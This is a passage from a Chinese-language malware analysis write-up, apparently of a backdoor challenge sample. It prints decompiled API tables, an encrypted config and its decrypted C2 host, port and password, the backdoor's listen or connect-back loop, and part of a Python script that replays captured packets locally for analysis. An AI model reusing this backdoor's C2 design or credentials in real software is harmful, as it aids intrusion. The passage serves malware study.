<span class="kt">void</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">memset</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">memcmp</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">strcmp</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">char</span> <span class="o">*</span><span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">strncpy</span><span class="p">)(</span><span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">);</span>
<span class="kt">wchar_t</span> <span class="o">*</span><span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">wcsncpy</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="k">const</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="kt">size_t</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">wcscmp</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">wcscat</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">InitializeCriticalSection</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">DeleteCriticalSection</span><span class="p">)(</span><span class="kt">void</span> <span class="o">*</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">EnterCriticalSection</span><span class="p">)(</span><span class="n">CRITICAL_SECTION</span> <span class="o">*</span><span class="p">);</span>
<span class="kt">void</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">LeaveCriticalSection</span><span class="p">)(</span><span class="n">CRITICAL_SECTION</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">CommandLineToArgvW</span><span class="p">;</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">MessageBoxW</span><span class="p">)(</span><span class="n">HWND</span><span class="p">,</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">GetSystemMetrics</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">NtUserGetDC</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CryptAcquireContextW</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CryptGenRandom</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CryptReleaseContext</span><span class="p">;</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">GetUserNameW</span><span class="p">)(</span><span class="kt">wchar_t</span> <span class="o">*</span><span class="p">,</span> <span class="n">DWORD</span> <span class="o">*</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">AllocateAndInitializeSid</span><span class="p">)(</span><span class="n">PSID_IDENTIFIER_AUTHORITY</span><span class="p">,</span> <span class="n">BYTE</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">DWORD</span><span class="p">,</span> <span class="n">PSID</span><span class="p">);</span>
<span class="n">BOOL</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">CheckTokenMembership</span><span class="p">)(</span><span class="n">HANDLE</span><span class="p">,</span> <span class="n">PSID</span><span class="p">,</span> <span class="n">BOOL</span> <span class="o">*</span><span class="p">);</span>
<span class="n">PVOID</span> <span class="p">(</span><span class="kr">__stdcall</span> <span class="o">*</span><span class="n">FreeSid</span><span class="p">)(</span><span class="n">PSID</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">WSAStartup</span><span class="p">)(</span><span class="n">WORD</span><span class="p">,</span> <span class="n">LPWSADATA</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">recv</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">send</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">shutdown</span><span class="p">)(</span><span class="n">SOCKET</span><span class="p">,</span> <span class="n">MACRO_SD</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">closesocket</span><span class="p">)(</span><span class="kt">int</span><span class="p">);</span>
<span class="n">SOCKET</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">socket</span><span class="p">)(</span><span class="n">MACRO_AF</span><span class="p">,</span> <span class="n">MACRO_SOCK</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="n">WORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">ntohs</span><span class="p">)(</span><span class="n">WORD</span> <span class="n">port</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">connect</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr_in</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">GetLastError</span><span class="p">)();</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">setsockopt</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">bind</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">listen</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="kt">int</span><span class="p">);</span>
<span class="kt">int</span> <span class="p">(</span><span class="kr">__cdecl</span> <span class="o">*</span><span class="n">accept</span><span class="p">)(</span><span class="kt">int</span><span class="p">,</span> <span class="k">struct</span> <span class="n">sockaddr</span> <span class="o">*</span><span class="p">,</span> <span class="kt">int</span> <span class="o">*</span><span class="p">);</span>
<span class="n">DWORD</span> <span class="n">getpeername</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">inet_addr</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">inet_ntoa</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">gethostbyname</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">gethostname</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">select</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">BitBlt</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">SelectObject</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">GetDIBits</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">DeleteObject</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateCompatibleBitmap</span><span class="p">;</span>
<span class="n">DWORD</span> <span class="n">CreateCompatibleDC</span><span class="p">;</span>
<span class="p">};</span>
</code></pre></div></div>
<h3 id="解密設定檔-malware-config">解密設定檔 (Malware config)</h3>
<p>後門程式通常會有一個設定檔,存放連線 C2 Server 所需要的資訊,例如 C2 的 Domain,Port,密碼,群組等等。通常惡意程式研究員也會透過這個設定檔的資訊進一步追蹤惡意程式的家族。解密設定檔的函數是 <code class="highlighter-rouge">sub_404FF0</code>,需要被解密的 Config 在 <code class="highlighter-rouge">0x415278</code></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>0FEh, 9Fh, 0D8h, 31h, 1, 0C8h, 1Ah, 31h, 0E2h, 47h, 3Dh, 0D8h, 5Eh, 7Ah, 40h, 3Bh, 0E5h, 6Ah, 0E1h, 7Fh, 0AAh, 42h, 0DAh, 58h, 0A7h, 0BAh, 26h, 0B9h, 2 dup(26h), 58h, 89h, 88h, 15h, 8Ah, 3Bh, 4Ch, 0B5h, 7Eh, 0E8h, 0DCh, 0D7h, 13h, 0CAh, 92h, 0E7h, 92h, 7Fh, 18h, 9Ch, 0D6h, 0C8h, 44h, 4Ch, 70h, 3Fh, 50h, 12h, 9Bh, 82h, 76h, 16h, 73h, 93h, 0BCh, 0Eh, 61h, 7Fh, 12h, 5, 0DAh, 3Eh, 9Ah, 5Bh, 49h, 0DBh, 47h, 0Eh, 49h, 0D5h, 0A9h, 37h, 18h, 0C4h, 7, 0D8h, 48h, 3Fh, 0AFh, 0D4h, 0B8h, 0FEh, 8Ah, 3Fh, 0C3h, 3Ch, 0F3h, 0D8h, 0B7h, 5Fh, 0C9h, 0D4h, 89h, 0DBh, 0C3h, 0DEh, 0C7h, 54h, 4, 5Bh, 0CDh, 3, 0F0h, 0F2h, 3Ch, 5Ah, 3Dh, 4Ch, 0A8h, 0EBh, 4Dh, 18h, 91h, 86h, 0BBh, 53h, 95h, 0A1h, 34h, 0C6h, 0E3h, 0FDh, 88h, 0D0h, 0F3h, 87h, 0, 65h, 75h, 7Dh, 0F3h, 57h, 87h, 0D1h, 94h, 0D4h, 2Ah, 0D2h, 0Eh, 31h, 0F7h, 9, 0D3h, 0E5h, 0Eh, 61h, 30h, 0D9h, 50h, 8Ch, 26h, 0DFh, 0CEh, 0A1h, 75h, 7Fh, 80h, 0Ah, 0F9h, 0FAh, 3Bh, 9Dh, 39h, 89h, 0DDh, 9, 3Eh, 0E6h, 0CBh, 74h, 0A1h, 0Dh, 9Dh, 62h, 0E8h, 44h, 17h, 0D9h, 13h, 59h, 5Bh, 0C3h, 71h, 2Bh, 5Eh, 93h, 0B8h, 6Bh, 99h, 2Bh, 55h, 0A4h, 1, 0FDh, 1, 79h, 38h, 71h, 95h, 2Fh, 5, 87h, 1Fh, 6Bh, 2, 0BEh, 35h, 3Ch, 94h, 34h, 89h, 5Bh, 20h, 0Eh, 0BEh, 0B2h, 7Ch, 1Ah, 7Ah, 1Ch, 0A4h, 0B3h, 0BDh, 6Ch, 0AFh, 0E6h, 71h, 0B0h, 1, 0D3h, 42h, 0B7h, 0C1h, 55h, 0AFh, 0D0h, 8Eh, 0E5h, 61h, 0D5h, 6Dh, 0BBh, 0BCh, 68h, 6, 37h, 0B5h, 7Dh, 11h, 80h, 0E3h, 19h, 0Bh, 6Bh, 0D8h, 58h, 2Dh, 9Eh, 0B1h, 0B5h, 9Eh, 0F5h, 9Bh, 86h, 8Dh, 24h, 16h, 0C6h, 0CAh, 9Eh, 7Ah, 17h, 0E6h, 0B6h, 0B1h, 7, 5, 4, 9Ch, 93h, 70h, 0Bh, 69h, 0EAh, 5, 18h, 6Eh, 73h, 52h, 6Dh, 0EAh, 10h, 79h, 9Fh, 3Ch, 0A5h, 60h, 3Dh, 0A8h, 0D4h, 0BBh, 0B2h, 0F9h, 0Bh, 0D4h, 6Dh, 0F8h, 0C1h, 0D5h, 2 dup(3Fh), 0FCh, 3Ch, 4, 48h, 17h, 89h, 85h, 0C9h, 0C2h, 39h, 9Dh, 44h, 4Ah, 0F8h, 9Bh, 0D9h, 1Bh, 13h, 0E8h, 60h, 83h, 2Ch, 0EAh, 0B4h, 0B8h, 31h, 27h, 51h, 1Dh, 8Fh, 0AEh, 22h, 0C1h, 0A2h, 0B3h, 94h, 28h, 70h, 79h, 0EFh, 4Fh, 98h, 75h, 0E6h, 0EAh, 85h, 0B0h, 6Dh, 0F0h, 0E7h, 6Dh, 0CAh, 59h, 64h, 0Ch, 0EFh, 27h, 8Ah, 2Eh, 7, 0A3h, 9, 1Ah, 4Fh, 0E9h, 1Fh, 5Fh, 27h, 0A6h, 53h, 0BBh, 69h, 21h, 66h, 3Ch, 0F9h, 78h, 87h, 0A5h, 9Dh, 2Ch, 0C6h, 13h, 0Fh, 0E0h, 0CBh, 0E0h, 51h, 5Eh, 2 dup(0C8h), 41h, 0DBh, 0ACh, 4Ah, 6Dh, 7Ch, 9Ah, 51h, 28h, 19h, 99h, 14h, 0DEh, 40h, 8Dh, 3Bh, 0A4h, 7Dh, 66h, 43h, 13h, 0D8h, 97h, 23h, 57h, 0A0h, 0C9h, 30h, 83h, 67h, 0D1h, 3Eh, 27h, 4Eh, 0E0h, 8, 25h, 83h, 0FAh, 0D2h, 0C0h, 7, 0AAh, 4Ch, 0F6h, 0B5h, 0F3h, 0BAh, 10h, 80h, 89h, 52h, 77h, 0FCh, 42h, 0E5h, 0C9h, 20h, 0C7h, 0C2h, 2Ch, 4Ah, 8Fh, 0D8h, 0E3h, 83h, 0Eh, 1Ah, 1Fh, 4, 29h, 28h, 17h, 0FAh, 0EEh, 2Bh, 5Ah, 87h, 82h, 0, 64h, 9, 5Ah, 9Ah, 70h, 9Eh, 0AEh, 0A1h, 8Eh, 0E8h, 2Bh, 5Fh, 0F5h, 0Dh, 0E9h, 0DDh, 9Ah, 2, 9Ch, 49h, 2, 0Ah, 0Eh, 9Bh, 54h, 79h, 0CDh, 79h, 0B2h, 0BEh, 20h, 57h, 0C9h, 0A0h, 40h, 0E2h, 0C1h, 0C8h, 0A0h, 9Fh, 0B4h, 80h, 3Ah, 0CFh, 0B4h, 0BAh, 0F6h, 97h, 46h, 54h, 0C3h, 5Dh, 56h, 9Ah, 0F2h, 75h, 0CCh, 0Dh, 0C6h, 0FDh, 0A5h, 63h, 0B7h, 5, 67h, 0CEh, 0A3h, 0F4h, 0C4h, 81h, 6Eh, 26h, 0AFh, 71h, 0C9h, 0DAh, 86h, 58h, 10h, 4Ch, 9Fh, 0, 7Ch, 1Eh, 25h, 0BEh, 9Ah, 0FCh, 22h, 3Ch, 0FCh, 80h, 0DCh, 7Ch, 2Eh, 53h, 65h, 1Ah, 0EBh, 96h, 6Eh, 0D2h, 91h, 80h, 5Ch, 41h, 0D3h, 48h, 9Eh, 0F0h, 0AEh, 45h, 3Dh, 8Eh, 9Eh, 54h, 0B4h, 7Dh, 11h, 7Ah, 3, 91h, 1Ch, 0CAh, 0FFh, 14h, 6Dh, 89h, 0ECh, 0Dh, 81h, 91h, 4Dh, 0C1h, 17h, 0F3h, 0FBh, 7Bh, 0E4h, 0E0h, 75h, 89h, 88h, 0CAh, 77h, 87h, 0C1h, 0C6h, 0CEh, 0E0h, 0DEh, 35h, 6Ah, 91h, 77h, 0A3h, 0B5h, 30h, 5Ch, 0EFh, 23h, 2Dh, 0CBh, 0ACh, 0Ah, 59h, 0E6h, 0C8h, 0B5h, 0A4h, 63h, 6Bh, 0B4h, 2Bh, 86h, 22h, 75h, 72h, 4Ch, 3Dh, 19h, 0EDh, 0EAh, 76h, 80h, 0C6h, 75h, 0D3h, 0A6h, 0DAh, 0E3h, 0CDh, 33h, 5, 32h, 0B1h, 4Dh, 9Fh, 0E7h, 47h, 0B1h, 46h, 0BAh, 0B2h, 2, 0DEh, 90h, 97h, 60h, 0D7h, 0A9h, 81h, 3Dh, 0AEh, 1Bh, 84h, 6Ch, 0B7h, 7Fh, 21h, 7Bh, 19h, 0EAh, 6Ah, 43h, 1Ah, 1Fh, 66h, 0BDh, 9Dh, 2, 0B7h, 18h, 0E8h, 50h, 7Ah, 8, 0ABh, 8Eh, 6Fh, 60h, 3Eh, 3Fh, 5Ah, 0E3h, 2Bh, 5Ah, 0A9h, 57h, 0ECh, 0FBh, 56h, 0DCh, 0F6h, 59h, 0Fh, 7Ch, 0F6h, 0F8h, 95h, 3, 5Ah, 20h, 62h, 11h, 13h, 8Dh, 8Eh, 6Dh, 99h, 68h, 0F3h, 9Ch, 30h, 76h, 90h, 0B3h, 6Bh, 90h, 2Bh, 69h, 0EEh, 53h, 3Ah, 70h, 77h, 18h, 4, 6, 20h, 26h, 4, 0A6h, 0DEh, 54h, 8Eh, 0A1h, 4Eh, 2 dup(0B5h), 0B3h, 0B1h, 73h, 6Bh, 5Ah, 34h, 0D7h, 0EAh, 27h, 76h, 0CFh, 53h, 0ADh, 44h, 80h, 95h, 87h, 0A7h, 65h, 91h, 8, 20h, 12h, 7Ch, 0B0h, 32h, 1, 84h, 5Bh, 21h, 9Ch, 0B6h, 0F7h, 0FAh, 50h, 1Fh, 6Ah, 0D3h, 67h, 31h, 6Fh, 54h, 7Dh, 69h, 0A0h, 76h, 33h, 2Fh, 0D3h, 8Bh, 27h, 0FEh, 0AAh, 7Fh, 23h, 0C4h, 66h, 5Dh, 94h, 8Ch, 0FCh, 14h, 3Eh, 5Ah, 6Bh, 7Ch, 2Fh, 56h, 4Ch, 94h, 0F1h, 2Dh, 0ABh, 0Eh, 4, 0B5h, 15h, 0Dh, 8Bh, 0D0h, 0F2h, 2Dh, 46h, 92h, 16h, 0C4h, 0C0h, 0A6h, 92h, 67h, 0CAh, 0EDh, 0D0h, 0B0h, 27h, 69h, 0DFh, 3Fh, 89h, 5Ah, 0Bh, 0FFh, 0BDh, 0A6h, 0B1h, 0AAh, 22h, 7Eh, 51h, 90h, 5Fh, 3Fh, 0E5h, 94h, 55h, 96h, 71h, 77h, 53h, 0E8h, 0DCh, 59h, 89h, 0F1h, 0FEh, 7Ch, 0C0h, 0ABh, 0FAh, 4Ch, 48h, 71h, 0CEh, 9Ch, 31h, 64h, 28h, 33h, 0BEh, 0Eh, 7Ch, 87h, 16h, 45h, 53h, 0C8h, 3Dh, 52h, 0E6h, 20h, 43h, 53h, 0EBh, 3Ah, 0BBh, 0DEh, 0AFh, 1, 6Fh, 0E7h, 65h, 0AAh, 52h, 0E4h, 0BDh, 0F4h, 0B6h, 2Eh, 0B9h, 0AEh, 0BFh, 0ABh, 0BDh, 7Ah, 18h, 0AAh, 0E5h, 0D2h, 0E4h, 0Eh, 9Ah, 48h, 0F8h, 0AFh, 68h, 12h, 47h, 0FDh, 0Ah, 0C5h, 9Dh, 0E7h, 0C7h, 61h, 91h, 0FBh, 2, 8Eh, 0B5h, 0CEh, 0Ch, 25h, 0Fh, 9Eh, 3Ch, 0F2h, 0CDh, 36h, 42h, 0B9h, 34h, 12h, 0B8h, 76h, 0DAh, 0C4h, 0FAh, 0E9h, 15h, 96h, 38h, 52h, 0B3h, 71h, 0C9h, 7Ah, 0EBh, 0FDh, 0C2h, 0F2h, 94h, 0Ah, 0C8h, 9Fh, 95h, 2Fh, 22h, 77h, 9Dh, 0B0h, 12h, 85h, 14h, 0A5h, 66h, 33h, 51h, 59h
</code></pre></div></div>
<p>解密後,我們可以獲得這些資訊,也可以將這些資訊建立 Local Type</p>
<table>
<thead>
<tr>
<th>Config</th>
<th>Context</th>
</tr>
</thead>
<tbody>
<tr>
<td>version</td>
<td>0x20170417</td>
</tr>
<tr>
<td>listen port</td>
<td> </td>
</tr>
<tr>
<td>port</td>
<td>0x24e3</td>
</tr>
<tr>
<td>host</td>
<td>probably.suspicious.to</td>
</tr>
<tr>
<td>password</td>
<td>welcomepass1!1</td>
</tr>
<tr>
<td>group</td>
<td>feye2017 cli</td>
</tr>
<tr>
<td>mutext</td>
<td>asdliugasldmgj</td>
</tr>
</tbody>
</table>
<h3 id="透過-socket-溝通">透過 Socket 溝通</h3>
<p>Socket 包含了被動連線(<code class="highlighter-rouge">0x4039A0</code>)與主動連線(<code class="highlighter-rouge">0x4038B0</code>)的兩種,主動連線用於在被控主機沒有 Public IP,或透過 NAT 方式上網等情況下使用。</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="k">if</span> <span class="p">(</span> <span class="n">functions</span><span class="p">.</span><span class="n">CreateMutexW</span><span class="p">(</span><span class="nb">NULL</span><span class="p">,</span> <span class="mi">1</span><span class="p">,</span> <span class="n">cofig</span><span class="p">.</span><span class="n">mutext</span><span class="p">)</span> <span class="o">&&</span> <span class="n">GetLastError</span><span class="p">()</span> <span class="o">!=</span> <span class="n">ERROR_ALREADY_EXISTS</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">while</span> <span class="p">(</span> <span class="mi">1</span> <span class="p">)</span>
<span class="p">{</span>
<span class="k">if</span> <span class="p">(</span> <span class="n">cofig</span><span class="p">.</span><span class="n">listen_port</span> <span class="p">)</span>
<span class="p">{</span>
<span class="n">bzero</span><span class="p">(</span><span class="o">&</span><span class="n">_client</span><span class="p">,</span> <span class="mi">2896u</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::</span><span class="n">Client</span><span class="p">(</span><span class="o">&</span><span class="n">_client</span><span class="p">,</span> <span class="o">&</span><span class="n">functions</span><span class="p">,</span> <span class="o">&</span><span class="n">cofig</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::</span><span class="n">InitPlugins</span><span class="p">(</span><span class="o">&</span><span class="n">_client</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::</span><span class="n">WaitServer</span><span class="p">(</span><span class="o">&</span><span class="n">_client</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::~</span><span class="n">Client</span><span class="p">(</span><span class="o">&</span><span class="n">_client</span><span class="p">);</span>
<span class="p">}</span>
<span class="k">else</span><span class="err"> </span>
<span class="p">{</span>
<span class="n">bzero</span><span class="p">(</span><span class="o">&</span><span class="n">client</span><span class="p">,</span> <span class="mi">2896u</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::</span><span class="n">Client</span><span class="p">(</span><span class="o">&</span><span class="n">client</span><span class="p">,</span> <span class="o">&</span><span class="n">functions</span><span class="p">,</span> <span class="o">&</span><span class="n">cofig</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::</span><span class="n">InitPlugins</span><span class="p">(</span><span class="o">&</span><span class="n">client</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::</span><span class="n">ConnectBack</span><span class="p">(</span><span class="o">&</span><span class="n">client</span><span class="p">);</span>
<span class="n">Client</span><span class="o">::~</span><span class="n">Client</span><span class="p">(</span><span class="o">&</span><span class="n">client</span><span class="p">);</span>
<span class="p">}</span>
<span class="n">functions</span><span class="p">.</span><span class="n">Sleep</span><span class="p">(</span><span class="mi">10000</span><span class="p">);</span>
<span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>目前為止我們知道 <code class="highlighter-rouge">secondstage.exe</code> 會透過 Socket 從 C2 Server 下載模組 (Plugin) 並載入功能,並解密封包。為了動態的逆向分析,我們同樣要修改 <code class="highlighter-rouge">hosts</code> (將 <code class="highlighter-rouge">probably.suspicious.to</code> 導向 <code class="highlighter-rouge">127.0.0.1</code>) 與匯出封包,而以往分析惡意程式的封包結構時,是用 wireshark 將資料以 <code class="highlighter-rouge">Raw</code> 的格式取出,再進行分析,但這樣的做法會在後續資料處理時,無法呈現封包的來源是 <code class="highlighter-rouge">server</code> 或 <code class="highlighter-rouge">client</code>,因此這次打算直接在 wireshark 匯出 <code class="highlighter-rouge">json</code> 的格式 (File -> Export Packet Dissections -> As JSON),這樣一來就可以透過 <code class="highlighter-rouge">ip.src</code> 來判斷 IP 的來源,拿 <code class="highlighter-rouge">data</code> 來組出 Stream</p>
<p>接著,建立 Python Socket 將封包傳送給 <code class="highlighter-rouge">secondstage.exe</code> 解密,初步嘗試解密封包結構時,發現除了前幾個 packet 以外,大部分內容都是經過加密或壓縮的。將封包傳給 client 的 <code class="highlighter-rouge">PythonSocket.py</code> 程式碼</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">struct</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="kn">from</span> <span class="nn">pprint</span> <span class="kn">import</span> <span class="n">pprint</span>
<span class="k">def</span> <span class="nf">read_packet</span><span class="p">():</span>
<span class="k">with</span> <span class="nb">open</span> <span class="p">(</span><span class="s">'packet.json'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span>
<span class="n">packet</span> <span class="o">=</span> <span class="n">json</span><span class="o">.</span><span class="n">load</span><span class="p">(</span><span class="n">f</span><span class="p">)</span>
<span class="k">print</span> <span class="nb">len</span><span class="p">(</span><span class="n">packet</span><span class="p">)</span>
<span class="k">return</span> <span class="n">packet</span>
<span class="k">def</span> <span class="nf">packet</span><span class="p">(</span><span class="n">conn</span><span class="p">):</span>
<span class="n">packet</span> <span class="o">=</span> <span class="n">read_packet</span><span class="p">()</span>
<span class="k">for</span> <span class="n">i</span><span class="p">,</span><span class="n">j</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">packet</span><span class="p">):</span>
<span class="n">ip_src</span> <span class="o">=</span> <span class="n">j</span><span class="p">[</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'ip'</span><span class="p">][</span><span class="s">'ip.src'</span><span class="p">]</span> <span class="c"># dict</span>
<span class="k">if</span> <span class="n">ip_src</span> <span class="o">==</span> <span class="s">'52.0.104.200'</span><span class="p">:</span> <span class="c"># only server data</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">j</span><span class="p">[</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'data'</span><span class="p">][</span><span class="s">'data.data'</span><span class="p">]</span> <span class="c"># get data</span>
<span class="n">data</span> <span class="o">=</span> <span class="n">data</span><span class="o">.</span><span class="n">replace</span><span class="p">(</span><span class="s">":"</span><span class="p">,</span><span class="s">""</span><span class="p">)</span>
<span class="c"># pprint(data)</span>
<span class="n">conn</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="n">data</span><span class="o">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'hex'</span><span class="p">))</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">print</span> <span class="s">"----- next packet -----"</span>
<span class="k">if</span> <span class="n">packet</span><span class="p">[</span><span class="n">i</span><span class="o">+</span><span class="mi">1</span><span class="p">][</span><span class="s">'_source'</span><span class="p">][</span><span class="s">'layers'</span><span class="p">][</span><span class="s">'ip'</span><span class="p">][</span><span class="s">'ip.src'</span><span class="p">]</span> <span class="o">==</span> <span class="s">'192.168.221.91'</span><span class="p">:</span> <span class="c">#check next packet for client</span>
<span class="n">recv_data</span> <span class="o">=</span> <span class="n">conn</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'got data from client'</span>
<span class="k">except</span> <span class="nb">KeyError</span><span class="p">:</span> <span class="c"># key = 'data'</span>
<span class="k">pass</span>
<span class="k">return</span> <span class="mi">0</span>
<span class="c">#Socket</span>
<span class="n">HOST</span> <span class="o">=</span> <span class="s">'0.0.0.0'</span> <span class="c"># bind</span>
<span class="n">PORT</span> <span class="o">=</span> <span class="mi">9443</span>
<span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="k">print</span> <span class="s">'Socket created'</span>
<span class="c">#Bind socket to local host and port</span>
<span class="k">try</span><span class="p">:</span>
<span class="n">s</span><span class="o">.</span><span class="n">bind</span><span class="p">((</span><span class="n">HOST</span><span class="p">,</span> <span class="n">PORT</span><span class="p">))</span>
<span class="k">except</span> <span class="n">socket</span><span class="o">.</span><span class="n">error</span> <span class="k">as</span> <span class="n">msg</span><span class="p">:</span>
<span class="k">print</span> <span class="s">'Bind failed. Error Code : '</span> <span class="o">+</span> <span class="nb">str</span><span class="p">(</span><span class="n">msg</span><span class="p">[</span><span class="mi">0</span><span class="p">])</span> <span class="o">+</span> <span class="s">' Message '</span> <span class="o">+</span> <span class="n">msg</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
